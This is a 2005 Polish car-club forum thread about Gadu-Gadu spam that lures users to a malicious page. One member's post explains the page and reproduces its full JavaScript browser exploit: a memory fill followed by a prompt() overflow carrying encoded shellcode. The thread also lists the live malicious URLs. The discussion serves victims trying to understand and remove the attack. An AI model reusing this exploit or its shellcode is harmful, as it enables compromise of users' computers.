MB/8 Club Poland - Klub i forum miłośników samochodów Mercedes-Benz

JEŚLI NIE JESTEŚ DOBRY W TEMACIE NIE OTWIERAJ TEJ STRONY

Wczoraj dostałem na GG wiadomość:




23:00:24 GG# 9706867
mam na imie Karolina,znalazlam cie na fotka.pl
jestes zajebisty,chce cie poznac!
moja fotka jest tutaj
http://iframebiz.biz/dl/adv435.php
http://iframebiz.biz/dl/adv435.php



Oczywiście z czystej ciekawości kto mi odwalił numer i wkleił moje zdjęcie gdzieś na necie otworzyłem. Oprócz zablokowania przeglądarki nic nie zauważyłem (wyskoczyło okno, klikałem "anuluj"). Czy ktoś bardziej kumaty mógłby sprawdzić co to za strona i co mogła zrobić w moim kompie.
Z góry dzięki

_________________
W126 300SE czyli Second Edition

Ex W123 200D

Ja dostałem coś takiego

"Siema jestem Tomek...
poznałem Cię przed szkołą
fajny z Ciebie gość
jak mnie nie pamiętasz
to zobacz sobie moje zdjęcia
które są tutaj:
LINK <--
Sorki musze lecieć pogadamy później"

Rownież z czystej ciekawości zobaczyłem co to za "leszcz" od razu NORTON = TROJAN...

Mam AVASTa i kerio ale żaden się nie odezwał

_________________
W126 300SE czyli Second Edition



Ex W123 200D

Jaki polecacie program antyvirusowy .Ja mam Nortona ,ale nie jestem z niego zadowolony .Już kilka razy scanowałem pliki ,które miały zawierać trojany i nic nie wykrył.

_________________
124 E220 coupe 96'FOTO
MB artykuły prasowe cz1
MB artykuły prasowe cz2

Skrypt php po otwarciu strony otwiera kolejną, a oto jej zawartość (w postaci niegroźnej):

Strona ponizsza dla niezorientowanych oprocz standarowych znacznikow HTML czyli języka w jakim pisane są strony WWW zawiera funkcje napisane w jezyku skryptowym JavaScript.
Wywolywana jest petla powtorzona 500 razy w obrębie ktorej powtornie wykonywana jest jedna funkcja, ktorej definicji nie znam niestety, a że nie jest zdefiniowana w tym pliku, wnioskuje ze jest to funkcja biblioteczna JS.

Widac wyraznie ze wartosc zwrocona przez tą funkcje jest w sposob ciagly dodawana do jednej zmiennej, co nieuchronnie prowadzi do przepelnienia jej pojemnosci czyli zjawiska fachowo zwanego przepelnieniem bufora.
To co nastepuje dalej to nadpisywanie nie przydzielonych tej zmiennej obszarow pamięci.

Nastepnie wartosc zmiennej EIP (dziwna zbieżność z nazwa rejestru) dodawana jest do zmiennej fillmem, ktora z kolei na moje oko jest niczym innym niz zwyklym szelkodem (wybaczcie, ale nie znam polskiego odpowiednika), czyli binarnym ciagiem instrukcji, ktore zostaną wykonane JAK KAZDY inny program, jesli "trafią" na newralgiczny segment pamieci, a to miala sie zatroszczyc petla

Reasumując, nie jestem w stanie powiedziec co ów szelkod ma wykonac, ale na pewno nic pozytecznego, w przypadku JESLI uda sie mu trafic na odpowiednie rejestry cel atakującego zostanie osiągniety, w innych przypadkach nastapi zawiecha albo przegladarki albo kompa. Czyli gosciu sobie siedzi i na chybił/trafił poluje na ludzikow, ktorzy podpasują mu konkretną wersja danej przeglądarki, gdyż na tym włąsnie opiera sie skutecznosc poniższego skryptu - błędów w konkretnych wersjach.

Sorry za przydługiego posta. Oby sie przydało.

Pozdrawiam,
Nimnod

--------------------------------------------------------

<!-- X-URL: http://iframebiz.biz/dl/fillmemadv435.htm -->
<!-- Date: Wed, 14 Dec 2005 05:25:32 GMT -->
<!-- Last-Modified: Sun, 11 Dec 2005 08:00:39 GMT -->
<BASE HREF="http://iframebiz.biz/dl/fillmemadv435.htm">

<HTML>
<HEAD>
<Script Language="JavaScript">


function load() {

var spearson=0
var eip = ""
var fillmem = ""


for (spearson=1 ; spearson <=500 ; spearson++)
{
eip = eip + unescape("%u7030%u4300")
}


for (spearson=1 ; spearson <=200; spearson++)
{
fillmem = fillmem + eip
}


fillmem = fillmem + unescape
("%uEED9%uD99B%u2474%u5EF4%uC02B%u082D%uFFFB%u2BFF"+
"%u60E0%uEC8B%uED83%u8BE0%u2BFD%u81C9%u6CE9%uFFFB"+
"%uF3FF%u2BA4%u2DC0%uFFD2%uFFFF%uC503%uE0FF%uDD8B"+
"%uC92B%uE981%uFEEC%uFFFF%u7381%uA944%u4A67%u83CC"+
"%uFCEB%uF4E2%u7541%uCC48%uEAA9%uD6FF%u67AA%u414A"+
"%uF314%uCC4E%u8FA9%uCE25%u67A9%u4E45%u661F%uCC4A"+
"%u27C3%uCC22%u6799%uA44A%u6351%uCC4A%u67C3%u59B5"+
"%u6305%uCC4A%uA7A2%u4845%u6633%uCC4A%uE220%uC8BE"+
"%u67A9%u39C1%u8F22%u34C1%u9F10%uCC4E%u94A9%u41EE"+
"%uF02C%uCC4A%u98A9%uA6AA%u0FAD%uFC4A%u67A9%uCC22"+
"%u66A9%uA64A%u98A9%u60DF%u67AD%uC74A%u6869%uAFCE"+
"%u67A8%u454A%u8B2C%uCC4E%uEAA9%u25CF%u67AA%u9C4A"+
"%uF256%uC8EE%u67A9%u0C41%uE3A6%uCD02%u67A9%u79C7"+
"%u643F%uCC4A%uDA24%uC8F6%u67A9%u26A2%u67A8%uC34A"+
"%u562B%uCC4B%u0DA9%uA64A%u0DA9%uA64A%uEAA9%u35CF"+
"%u67AA%u9C4A%uF256%uC8F6%u67A9%u0C41%uE3A6%uCD5E"+
"%u67A9%u49C3%u6371%uCC4A%u67C3%uCC20%u64C3%uCC20"+
"%u67C3%u9C20%uE224%uC801%u67A9%u471A%uBF2C%uCC4E"+
"%u37A9%u59B5%u636D%uCC4A%uA7A2%u4845%u674F%uCC4A"+
"%uE220%uC896%u67A9%uCD20%u67C1%u8C4A%u0DA9%uA64A"+
"%u0DA9%u414A%u042C%uCC4E%u37A9%u49C7%u645C%uCC4A"+
"%uECF9%u10CF%u67AD%u9C4A%uF256%uC882%u67A9%u0C41"+
"%uE3A6%uCCFA%u67A9%u49C3%u6349%uCC4A%u67C3%uCC20"+
"%u67C3%uCC20%uE222%uC8AA%u67A9%u331A%uAB3C%uCC4E"+
"%u6CA9%uC38A%uEA2D%uCC4A%uEEA9%u28CF%u67AD%u414A"+
"%u8F2C%uCC4E%u37A9%u3322%u6756%u474A%u8B2C%uCC4E"+
"%u37A9%u49C1%u6349%uCC4A%u98F9%u0CDF%u67AD%uC74A"+
"%u1369%u4796%u8F2C%uCC4E%u6CA9%uB88A%uEA7B%uD6FF"+
"%u67AA%uA44A%u66A9%uCC4A%u98FF%u78DF%u67AD%u414A"+
"%u1C2C%uCC4E%u37A9%u331C%uDF3C%uCC4E%uECA9%u7492"+
"%u67AB%uCC4A%u5241%uCC4A%uECA9%u20F7%u67AD%u474A"+
"%u8F1C%uCC4E%u8FA9%uCC03%u67A9%u49C1%u6379%uCC4A"+
"%u98F9%u6CDF%u67AD%uA64A%uEAA8%uD6CF%u67AA%u9C4A"+
"%uF256%uC8FA%u67A9%uCC20%uF256%uC8E2%u67A9%uA62A"+
"%u0FA9%uCCCA%u67A9%uA61A%u0DA9%uA449%u67A9%u0C4A"+
"%u98FA%u58DF%u67AD%u454A%uB72C%uCC4E%uEEA9%uE80E"+
"%u06B5%uAC89%u67C3%u9A1E%u98FE%u1CFF%u67AD%u334A"+
"%uFB3C%uCC4E%uEEA9%uE80E%u06B5%uAC89%u00CD%uCCEB"+
"%u27A9%u47D9%u98EA%uB90A%uEC50%uCF11%uF4CF%u4D2C"+
"%u2A92%uB810%uE6B3%uCCA1%u66A9%uAA4A%u5C28%u9607"+
"%u6ADD%u27CB%u67A9%uCC4B%uE6CF%u8171%u12F3%u45B9"+
"%u43F5%uAD56%u076A%u1E79%uE7FF%uCC74%u75DD%uB8EC"+
"%u2551%u9D71%u10B1%uFF5C%u2869%uB9E4%u3954%u24A1"+
"%uEEEF%uE83E%uEEA1%uE81E%u9F89%uAD12%u9E6A%u0B12"+
"%u43ED%uCC56%u67A9%uAD4A%u076A%u14C1%u2C22%u4776"+
"%u6CE5%uCF32%uEC62%uEC1B%uB4AA%uF6C1%u9CAA%uA61D"+
"%u8F56%u33E5%u9856%uE138%u20F6%u471D%u43F8%u1F49"+
"%uD0A6%u8E5E%u2622%uCF56%uEC6A%u5C4E%uA4AA%u471C"+
"%u43DD%u4546%uD9AD%u4714%u43D5%u4C4E%u6797%u1D3F"+
"%u3FF1%uADB2%u9E6A%u9412%uA4C8%uBE09%u06CC%uA93E"+
"%u0EEF%uA926%u67E8%uA919%u21DD%uA023%u37CC%uA525"+
"%u13C7%uBE2F%u30A9%uA538%u02DD%uA50C%u02C5%u8F4A"+
"%u08C5%uA939%u06E1%uA824%u02C5%u804A%u06C6%u802E"+
"%u05C0%uAD38%u1EDB%uCC0B%u1FEC%uB823%u15F9%uAF25"+
"%u14CC%uCC39%u0EFF%uB838%u06DC%u8D26%u0BC5%uAF25"+
"%u30A9%uA223%u1FEC%uAF2F%u20A9%uB82F%u1EFA%uB839"+
"%u0ACC%uA50E%u02DB%uB829%u15C6%u8D33%u0BA9%uB839"+
"%u04DB%uB82B%u67A9%uA203%u02DD%uA238%u13CC%uBC05"+
"%u09CC%uCC0B%u09E0%uA93E%u09DB%uB82F%u02FB%uA82B"+
"%u0EEF%uA926%u2EA9%uB824%u15CC%uA924%u24DD%uA225"+
"%u02C7%uB829%u67E8%uB802%u17DD%uBC05%u09CC%uA918"+
"%u12D8%uBF2F%u26DD%u844A%u13DD%u9F3A%u09CC%u9E2E"+
"%u16CC%uA93F%u13DA%uCC0B%u10A9%uA223%u09C0%uB82F"+
"%u0387%uA026%u20A9%u980F%u2AA9%uB625%u0BC0%uAD26"+
"%u5386%uFC64%u4F89%uA329%u17C4%uB82B%u05C0%uA926"+
"%u4792%u9F07%u22E0%uFA6A%u5787%uEC71%u0EFE%uA824"+
"%u10C6%uEC39%u33E7%uF96A%u5687%uEC71%u31FA%uF77B"+
"%u2A89%u8533%u55EC%uEC71%u2987%u980F%u2489%u9E06"+
"%u5689%uFD64%u5387%uFE79%u4E9B%uA54A%u15CF%uA12B"+
"%u05CC%uB623%u0587%uB623%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%uE34A%u0BCD%uA065%u06C6%uA92E%u06DB%uBA2E"+
"%u549D%uE27F%u1FCC%uCC2F%u67A9%u904A%u04DA%uB827"+
"%u5198%uA964%u02D1%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%u5C4A")

prompt(fillmem, fillmem)

}
</Script>
</head>
<body onload="setTimeout('load()',500)">
</body>
</HTML>

_________________
RIP MB W123 300D 1981
RIP SAAB 9000 3.0V6 1994
hooz next?

Takie wiadomości sa rozsyłane z tego co widzę po całym kraju.
Nie wiem czy przez jedna osobę,czy przez grupe .
Podobno administrator GG czy ktos taki miałby się tym zając ale czy to prawda to nie wiem.Średnio raz dziennie otrzymuje taka wiadomośc na GG.

Ja mam Anti Vir XP.Firmy Datentechnik GmbH.
Program użytkuje od roku ,aktualizuje na bierząco.
Nic mi się dziwnego nie wydarzyło odkąd go mam.
Wczesniej miałem Nortona ,przez 3 dni dokąd nie padł komputer.

_________________
123 200 1982

Wczoraj dostałem też wiadomość z tego samego numeru, właśnie sprawdziłem, ale mi pisało, że ktoś tam wygrał jakąś nagrodę i żebym wszedł na strone zobaczyć wyniki jakiegoś głosowania. Ale nei wszedłem na szczęście tylko wywaliłem...

_________________
teraz służbowe
--------------------------------
w123 200D 1984 sprzedany
wersja taxi, ale nie na taxi:)
"Kość słonia"
--------------------------------
w123 240D 1979
ale już na częściach...

No nieźle:

Sprzed chwili:

Pod chwilą emocji nie wiedziałem czym postraszyć

"9703095 8:51:22

Witam

Łukasz 8:51:33

cześć

9703095 8:51:35

mam na imie Karolina,znalazlam cie na fotka.pl
jestes zajebisty, chce cie poznac!
moja fotka jest tutaj
http://85.255.113.242/adv/121/


Łukasz 8:52:06

już i tak Twoje numery są na policji"

Ciekawe, ciekawe.

Ja wczoraj miałem tylko "cześć", niestety nie archiwizuję GG na jednym z komputerów, ale pamiętam, że numer był wysoki i zaczynał sie na 9.

Mówicie, że to ogólny trend na GG, czy może ktoś poluje na forumowiczy?

_________________
123. W, S i C.

Ogólny trend. Te wiadomości wysyłane są z bardzo wielu numerów gg (np 8054836 ,9503306, 9503409, 7664158, 8005996, 5845387 i z każdą chwilą jest ich więcej). Dostaję je (chyba dwa razy jak dotąd) tylko na jeden nr gada - taki, na którym jestem zawsze widoczny i dla każdego. Inne numery, z zaznaczonym "tylko dla znajomych" i na których zawsze się czaję nie są nękane .

Ja polecam pod 'łindołsa' Avast'a: http://www.avast.pl/

Ja jeszcze nie dostałem takiej wiadomości na GG. Były kiedyś jakieś głupoty na temat stronki z dzwonkami polifonicznymi, które koniecznie muszę mieć... olałem.

Pozdrawiam,

_________________
Konrad Lapsz / harrier
[ex]: W126 280SE, S210 E320 CDI, X166 GL350 BlueTEC
[in]: S211 E320 CDI, W639 Viano 3.0 CDI

hmmm ja robie takich komputerkow dziennie kolo 4 .. dobry sposob ma wyczyszczenie podlaczyc dysk z takiego kompa pod drugiego i wystarczy p[rzeskanowac samym mks-on line .. wywali 99% smieci z tym ze po takiej zbawie czesto jest potrzebna instalacja ,,naprawcza,, systemu bo potrafi wywalic kilka wpisow i plikow systemowych skojarzonych z trojanami ... Po takim czyszczeniu i ustawieniu systemu zainstalowac( najlepiej xp +sp2) avas + noadware3.0 polecam bo sie sprawdza. Jeden program nie pomoze no i trzeba patrzec co sie akceptuje .. Przy innych smieciach typu ,,spyware detect,, dla fanow poszukiwania rozwiazan proponuje zabawe z wyszukaniem plikow tzw ,,falszywej tapety,, ( czaslochlonne z marnym efektem) albo przeinstalowac system na zasadzie opcji instalacji systemu windows ,,pozostaw system plikow bez zmian,, --> usun katalog windows... Wiem ze mozna sie bawic w naprawe systemu ale patrzac ze szukanie wirusa zajmie nam 4h i i tak cos zostanie w systemi a reinstalacja nawet z pelnym formatem 3h to ja wybieram opcje 2 przy wczesnijeszym zabezpieczeniu danych oczywiscie !!!
pozdrawiam

_________________
w124 230 CE '89r Przyrósł do mnie i nie chce się odczepić ;P
300c 5.7 hemi 2004 (tak znowu to zrobiłem ... prawie jak Kijek)
i jeszcze ze 2 inne na F i na... VW :P
ex 126 280se Kijek
ex 115 220d

Ja też to dostałem !!! Włączyłem i musiałem Windowsa od nowa instalować

Z antywirow ostatnio testuje Nortona internet Security 2006 pakiet jes poprawiony mocno wzgledem poprzednika i zaczynami sie podobac, poprzednio używalem kasperskiego w sumie też dobry ale czasem sie wywala prze graniu w sieci!!!

_________________
Toyota MR2 2,0 '93
Chrysler Voyager 3,8 auto na zakupy :)
ex: S124 300TE 4matic '87 w świni, patyku i leniuchu
ex: Ford Escort MK II 75' 1,3GL
ex: Nissan Micra 1,3 RR Edition
Ex: W124 300E 4matic '87
[url=http://www.w114-115.org.pl/jomla/content/view/145/52/]RR Auto Szczecin-Pilchowo, ul. Staroleśna 1A[/url]

Ktoś mi powiedział (laik jak ja, też gdzieś słyszał) że ten program/strona dłubie coś w GG by sam się dalej rozsyłał z twojej książki. Może to coś pomoże.
Dzięki za odpowiedż choć za dużo nie zrozumiałem .
W razie czego jak przeinstalować windę by nie tracić danych czy "saveów" z gier?
W linuksie takich problemów nie ma .
P.S. Widział ktoś tlen na linuxa, w nie sprawiającej problemów (instalacja) wersji?

_________________
W126 300SE czyli Second Edition



Ex W123 200D